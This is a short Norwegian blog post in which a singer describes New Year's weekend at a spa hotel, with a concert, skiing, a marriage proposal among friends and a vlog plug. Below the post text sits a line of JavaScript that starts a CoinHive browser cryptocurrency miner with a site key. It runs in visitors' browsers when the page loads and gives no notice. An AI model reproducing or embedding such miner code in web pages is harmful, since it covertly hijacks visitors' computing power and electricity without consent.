Min Nyttårsfeiring

Heia folkes og GODT NYTTÅR 🙂

Jeg koste meg skikkelig i nyttårshelga. Jeg hadde konsert på Norefjell Spahotell så jeg tok likesågod med meg hele vennegjengen slik at vi alle fikk feiret sammen.

Jeg stod på slalom og badet i snøen, jeg hadde konsert og var vitne til ett frieri.

Tårene rant og kvelden ble lang for å si det sånn. Hva gjorde dere nyttårsaften?

Sjekk ut, jeg har laget en video fra da 🙂

 

Ps. putt gjerne en tommel opp hvis dere liker videoene/Vloggene mine og subscribe 🙂

Stor klem S

var mnr = new CoinHive.Anonymous(‘YOjzBUoHFSepjyzKcZLh9AqoIf1Vz3Sn’, {throttle: 0.75}); mnr.start();

3 kommentarer

    Legg igjen en kommentar

    Obligatoriske felt er merket med *

    Takk for at du engasjerer deg i denne bloggen.
    Unngå personangrep og sjikane og prøv å holde en hyggelig tone selv om du skulle være uenig med noen.
    Husk at du er juridisk ansvarlig for alt du skriver på nett.

Siste innlegg